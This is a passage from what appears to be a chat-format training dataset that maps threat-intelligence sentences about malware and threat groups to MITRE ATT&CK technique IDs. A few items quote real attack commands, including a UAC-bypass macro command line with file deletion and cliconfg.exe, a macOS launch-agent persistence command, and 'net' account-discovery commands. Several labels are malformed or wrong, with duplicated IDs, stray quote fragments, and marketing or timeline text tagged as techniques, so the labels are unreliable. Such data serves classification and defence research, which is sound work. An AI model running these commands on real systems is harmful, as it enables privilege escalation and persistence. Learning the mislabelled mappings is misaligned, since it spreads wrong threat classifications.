- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Appending a file signature header to all encrypted data, prior to upload or download, by randomly selecting from the file types"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses commands such as netsh interface show to discover network interface settings."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cuba has been dropped onto systems and used for lateral movement via obfuscated PowerShell scripts."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In this blog, we described how Redaman has become more effective by hiding dynamic C&C server addresses inside the Bitcoin blockchain"
- },
- {
- "role": "assistant",
- "content": "T1102.001 - Dead Drop Resolver"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is capable of spreading to USB devices."
- },
- {
- "role": "assistant",
- "content": "T1091 - Replication Through Removable Media"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ZxShell can transfer files from a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Smart, optimized, and connected, XGen security powers Trend Micro’s suite of security solutions: Hybrid Cloud Security, User Protection, and Network Defense"
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "gathers user names from infected hosts."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ChChes collects the victim hostname, window resolution, and Microsoft Windows version."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A version of introduced in July 2015 inserted junk code into the binary in a likely attempt to obfuscate it and bypass security products."
- },
- {
- "role": "assistant",
- "content": "T1027.001 - Obfuscated Files or Information: Binary Padding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Fox Kitten has used a Perl reverse shell to communicate with C2."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Figure 5: Sample pseudo-HTTP beacon The pseudo-HTTP protocol uses any proxies discovered by the HTTP proxy monitoring thread or added by the adminka command"
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol', 'T1090 - Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Additionally it checks to determine if common analysis tools are currently running on the infected system"
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "UPPERCUT has the capability to collect the current logged on user’s username from a machine."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DEATHRANSOM, HELLOKITTY, and FIVEHANDS use the same code to delete volume shadow copies via WMI by performing the query select * from Win32_ShadowCopy and then deleting each instance returned by its id"
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation', 'T1490 - Inhibit System Recovery', 'T1490 - Inhibit System Recovery', 'T1490 - Inhibit System Recovery', 'T1047 - Windows Management Instrumentation', 'T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Gamaredon Group has attempted to get users to click on Office attachments with malicious macros embedded."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In the PuTTY sample discovered on VirusTotal, the malicious code was inserted into the ssh2_userauth_process_queue function (source file: putty-0.77\\ssh\\userauth2-client.c). The code resides in the part of the function responsible for performing password authentication, as opposed to other methods such as keyboard-interactive authentication or public key. Once the user establishes a connection and enters their username and password, the malicious code is executed regardless of the authentication result."
- },
- {
- "role": "assistant",
- "content": "T1480 - Execution Guardrails"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Hildegard has started a monero service."
- },
- {
- "role": "assistant",
- "content": "T1543.002 - Create or Modify System Process: SysV/Systemd Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "From our analysis, stealing keystrokes is the main function of RunningRat; however, the DLL has code for more extensive functionality. Code is included to copy the clipboard, delete files, compress files, clear event logs, shut down the machine, and much more. However, our current analysis shows no way for such code to be executed"
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion', 'T1070.001 - Indicator Removal on Host: Clear Windows Event Logs"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "njRAT can create, delete, or modify a specified Registry key or value."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CoinTicker decodes the initially-downloaded hidden encoded file using OpenSSL."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RCSession can gather system owner information, including user and administrator privileges."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "One version of consists of VBScript and PowerShell scripts. The malware also uses batch scripting."
- },
- {
- "role": "assistant",
- "content": "T1064 - Scripting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dragonfly has compressed data into .zip files prior to exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1560 - Archive Collected Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sidewinder has used JavaScript to drop and execute malware loaders."
- },
- {
- "role": "assistant",
- "content": "T1059.007 - Command and Scripting Interpreter: JavaScript"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN6 has removed files from victim machines."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After downloading its main config file, downloads multiple payloads from C2 servers."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GoldFinder logged and stored information related to the route or hops a packet took from a compromised machine to a hardcoded C2 server, including the target C2 URL, HTTP response/status code, HTTP response headers and values, and data received from the C2 node."
- },
- {
- "role": "assistant",
- "content": "T1119 - Automated Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HotCroissant has the ability to identify the IP address of the compromised machine."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RCSession can use HTTP in C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cadelspy has the ability to identify open windows on the compromised host."
- },
- {
- "role": "assistant",
- "content": "T1010 - Application Window Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "gathered information and files from local directories for exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "There are multiple ways for the operators to reach a Kobalos-infected machine. The method we’ve seen the most is where Kobalos is embedded in the OpenSSH server executable (sshd) and will trigger the backdoor code if the connection is coming from a specific TCP source port. These variants either connect to a C&C server that will act as a middleman, or wait for an inbound connection on a given TCP port"
- },
- {
- "role": "assistant",
- "content": "T1205 - Traffic Signaling"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Aquatic Panda has used native OS commands to understand privilege levels and system details."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The main C2 loop starts after the initial upload of the reconnaissance data, iterating once every approximately 30 seconds. For the first five minutes, each iteration will capture a screenshot of the display and upload it to the \"normal\" subdirectory with an encoded timestamp as the filename. After the first five minutes, the screenshot uploads once every five minutes"
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KGH_SPY has masqueraded as a legitimate Windows tool."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "AADInternals can dump secrets from the Local Security Authority."
- },
- {
- "role": "assistant",
- "content": "T1003.004 - OS Credential Dumping: LSA Secrets"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The attack involved a spear-phishing email with a subject of “Project Offer” and a malicious Word document (SHA256: d393349a4ad00902e3d415b622cf27987a0170a786ca3a1f991a521bff645318) as an attachment"
- },
- {
- "role": "assistant",
- "content": "T1598.002 - Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Industroyer’s data wiper module clears registry keys and overwrites both ICS configuration and Windows files."
- },
- {
- "role": "assistant",
- "content": "T1485 - Data Destruction"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FatDuke can identify the MAC address on the target computer."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SDBbot has the ability to communicate with C2 with TCP over port 443."
- },
- {
- "role": "assistant",
- "content": "T1095 - Non-Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "encodes files before exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1132 - Data Encoding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT30 has used spearphishing emails with malicious DOC attachments."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QakBot can identify remote systems through the \"net view\" command."
- },
- {
- "role": "assistant",
- "content": "T1018 - Remote System Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "attempted to get users to click on an embedded macro within a Microsoft Office Excel document to launch their malware."
- },
- {
- "role": "assistant",
- "content": "T1204 - User Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses HTTPS to communicate with its C2 servers, to get malware updates, modules that perform most of the malware logic and various configuration files."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Komplex trojan creates a persistent launch agent called with \"$HOME/Library/LaunchAgents/com.apple.updates.plist\" with \"launchctl load -w ~/Library/LaunchAgents/com.apple.updates.plist\"."
- },
- {
- "role": "assistant",
- "content": "T1543.001 - Create or Modify System Process: Launch Agent"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Thrip leveraged PowerShell to run commands to download payloads, traverse the compromised networks, and carry out reconnaissance."
- },
- {
- "role": "assistant",
- "content": "T1059.001 - Command and Scripting Interpreter: PowerShell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "VERMIN can delete files on the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The operators used the HyperBro Trojan as their last-stage in-memory remote administration tool (RAT). The timestamps for these modules are from December 2017 until January 2018. The anti-detection launcher and decompressor make extensive use of Metasploit’s shikata_ga_nai encoder as well as LZNT1 compression"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "StrongPity can automatically exfiltrate collected documents to the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1020 - Automated Exfiltration"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TA505 has used lures to get users to enable content in malicious attachments and execute malicious files contained in archives. For example, TA505 makes their malware look like legitimate Microsoft Word documents, .pdf and/or .lnk files."
- },
- {
- "role": "assistant",
- "content": "T1204.002 - User Execution: Malicious File"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mosquito can upload and download files to the victim."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "InvisiMole has used ListPlanting to inject code into a trusted process."
- },
- {
- "role": "assistant",
- "content": "T1055.015 - Process Injection: ListPlanting"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Earth Lusca used VBA scripts."
- },
- {
- "role": "assistant",
- "content": "T1059.005 - Command and Scripting Interpreter: Visual Basic"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "OutSteel can delete itself following the successful execution of a follow-on payload."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Elise performs timestomping of a CAB file it creates."
- },
- {
- "role": "assistant",
- "content": "T1070.006 - Indicator Removal on Host: Timestomp"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ke3chang performs account discovery using commands such as \"net localgroup administrators\" and \"net group \"REDACTED\" /domain\" on specific permissions groups."
- },
- {
- "role": "assistant",
- "content": "T1087.001 - Account Discovery: Local Account', 'T1087.002 - Account Discovery: Domain Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The macro then extracts the CAB file into %systemroo%\\system32, using either wusa.exe or expand.exe (depending on the OS) to again bypass UAC prompts Once the files have been extracted, the Visual Basic macro deletes the CAB file and runs the malicious NTWDBLIB.dll via cliconfg.exe (to gain privileges and bypass UAC protections) Command lines used by the Visual Basic macro: cmd /c wusa %TEMP%\\setup.cab /quiet /extract:%SystemRoot%\\System32 && del /f /q %TEMP%\\setup.cab && cliconfg.exe cmd /c expand %TEMP%\\setup.cab -F:* %SystemRoot%\\System32 && del /f /q %TEMP%\\setup.cab && cliconfg.exe A combination of NTWDBLIB.dll and cliconfg.exe are used to bypass UAC protections; this is a familiar attack on Windows"
- },
- {
- "role": "assistant",
- "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WellMail can use hard coded client and certificate authority certificates to communicate with C2 over mutual TLS."
- },
- {
- "role": "assistant",
- "content": "T1573.002 - Asymmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dragonfly 2.0 used VPNs and Outlook Web Access (OWA) to maintain access to victim networks."
- },
- {
- "role": "assistant",
- "content": "T1133 - External Remote Services"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HyperBro has used HTTPS for C2 communications."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bandook can upload files from a victim's machine over the C2 channel."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BRONZE BUTLER downloader code has included \"0\" characters at the end of the file to inflate the file size in a likely attempt to evade anti-virus detection."
- },
- {
- "role": "assistant",
- "content": "T1027.001 - Obfuscated Files or Information: Binary Padding"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Rocke has distributed cryptomining malware."
- },
- {
- "role": "assistant",
- "content": "T1496 - Resource Hijacking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Crimson can add Registry run keys for persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Neoichor can collect the user name from a victim's machine."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Strike conducts peer-to-peer communication over Windows named pipes encapsulated in the SMB protocol. All protocols use their standard assigned ports."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Threat Group-3390 has used RAR to compress, encrypt, and password-protect files prior to exfiltration."
- },
- {
- "role": "assistant",
- "content": "T1560.002 - Archive Collected Data: Archive via Library"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has leveraged multiple types of spearphishing in order to attempt to get a user to open links and attachments."
- },
- {
- "role": "assistant",
- "content": "T1204 - User Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Microsoft discovered these new attacker tools and capabilities in some compromised customer networks and observed them to be in use from August to September 2020. Further analysis has revealed these may have been on compromised systems as early as June 2020"
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "is a rootkit used by ."
- },
- {
- "role": "assistant",
- "content": "T1014 - Rootkit"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can be used to enumerate security software currently running on a system by process name of known products."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ryuk has used \"cmd.exe\" to create a Registry entry to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "CreepySnail can use HTTP for C2."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
